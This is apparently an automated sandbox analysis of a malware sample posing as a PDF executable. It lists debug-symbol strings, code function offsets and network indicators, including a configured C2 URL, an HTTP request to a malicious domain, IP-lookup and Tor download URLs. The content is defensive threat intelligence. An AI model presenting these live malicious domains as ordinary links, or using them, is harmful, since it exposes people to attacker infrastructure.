                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb<Cwo source: NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: fwpuclnt.pdbH source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.810472818.0000000001543000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb6 source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: NewApp.PDBI source: NewApp.exe, 0000000F.00000002.806394877.0000000000FD7000.00000004.00000010.sdmp
                      Source: Binary string: wimm32.pdbO5 source: WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdbD source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdbh source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb** source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670942444.0000000000EBA000.00000004.00000020.sdmp
                      Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp, NewApp.exe, 0000000F.00000002.806394877.0000000000FD7000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.806993531.0000000000537000.00000004.00000010.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: edputil.pdb: source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdb;^ source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001F.00000003.804994756.0000000000A15000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdbg source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdbs source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb1 source: NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\NewApp\NewApp.PDBL source: NewApp.exe, 0000000F.00000002.806394877.0000000000FD7000.00000004.00000010.sdmp
                      Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000001F.00000003.829429051.0000000004E26000.00000004.00000001.sdmp
                      Source: Binary string: msasn1.pdbb source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: ore.pdb source: WerFault.exe, 0000001F.00000003.829429051.0000000004E26000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdbW% source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdby source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001F.00000003.806548362.0000000000A27000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000A.00000003.685738561.0000000005184000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832058326.0000000005764000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb" source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: clrjit.pdb/t)r source: WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: }}NewApp.PDB} source: NewApp.exe, 00000013.00000002.806993531.0000000000537000.00000004.00000010.sdmp
                      Source: Binary string: edputil.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc.pdb[e<jr source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp

                      Networking:

                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractor | URLs: http://IScLhfPkYRYa5.com
                      Source: global traffic | HTTP traffic detected: GET /base/008D1C43D45C0A742A0D32B591796DBD.html HTTP/1.1; Host: coroloboxorozor.com; Connection: Keep-Alive
                      Source: Joe Sandbox View | IP Address: 104.21.71.230
                      Source: unknown | DNS traffic detected: queries for: coroloboxorozor.com
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp, NewApp.exe, 0000001B.00000002.912580946.0000000003191000.00000004.00000001.sdmp, NewApp.exe, 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: NewApp.exe, 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp, 0603321WG_0_1 pdf.exe, 00000007.00000002.914638851.0000000002E5C000.00000004.00000001.sdmp | String found in binary or memory: http://IScLhfPkYRYa5.com
                      Source: NewApp.exe, 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp | String found in binary or memory: http://ajyrmk.com
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmp | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.671188630.0000000002CD1000.00000004.00000001.sdmp, NewApp.exe, 0000000F.00000002.811943679.0000000003221000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.811688345.00000000024C1000.00000004.00000001.sdmp | String found in binary or memory: http://coroloboxorozor.com
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.671188630.0000000002CD1000.00000004.00000001.sdmp, NewApp.exe, 0000000F.00000002.811943679.0000000003221000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.811688345.00000000024C1000.00000004.00000001.sdmp | String found in binary or memory: http://coroloboxorozor.com/base/008D1C43D45C0A742A0D32B591796DBD.html
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmp | String found in binary or memory: http://cps.letsencrypt.org0
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmp | String found in binary or memory: http://cps.root-x1.letsencrypt.org0
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmp | String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmp | String found in binary or memory: http://mail.orienttech.com.qa
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmp | String found in binary or memory: http://r3.i.lencr.org/0
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmp | String found in binary or memory: http://r3.o.lencr.org0
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.671188630.0000000002CD1000.00000004.00000001.sdmp, NewApp.exe, 0000000F.00000002.811943679.0000000003221000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.811688345.00000000024C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%$
                      Source: NewApp.exe, 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.679176630.00000000047A2000.00000004.00000001.sdmp, 0603321WG_0_1 pdf.exe, 00000007.00000002.909029563.0000000000402000.00000040.00000001.sdmp, NewApp.exe, 0000000F.00000002.850762818.00000000050CD000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.879172967.00000000064E4000.00000004.00000001.sdmp, NewApp.exe, 0000001B.00000002.909001517.0000000000402000.00000040.00000001.sdmp, NewApp.exe, 0000001C.00000002.806272942.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp, NewApp.exe, 0000001B.00000002.912580946.0000000003191000.00000004.00000001.sdmp, NewApp.exe, 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: NewApp.exe, 0000000F.00000002.809472540.0000000001498000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Window created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 0_2_05C00720
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_00E96830
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_00E95AD0
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_00E9E248
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_00E9B0B9
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_00E9D818
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_00E9D2AF
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_00E9D397
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_00E9D723
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_029146A0
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_029145D0
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_0291D281
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_05F01CC8
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_05F00040
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_05F01448
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_05F03340
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_05F03ACC
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_05F06E7C
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_05F07268
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe | Code function: 7_2_05F0A728
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Code function: 27_2_056846A0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Code function: 27_2_056835C4
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Code function: 27_2_056845F0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Code function: 27_2_056845B0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Code function: 27_2_05684650
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Code function: 27_2_05684630
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Code function: 27_2_05685390
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Code function: 27_2_0568D281
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Code function: 28_2_02FE46A0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Code function: 28_2_02FE4672
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Code function: 28_2_02FE4630
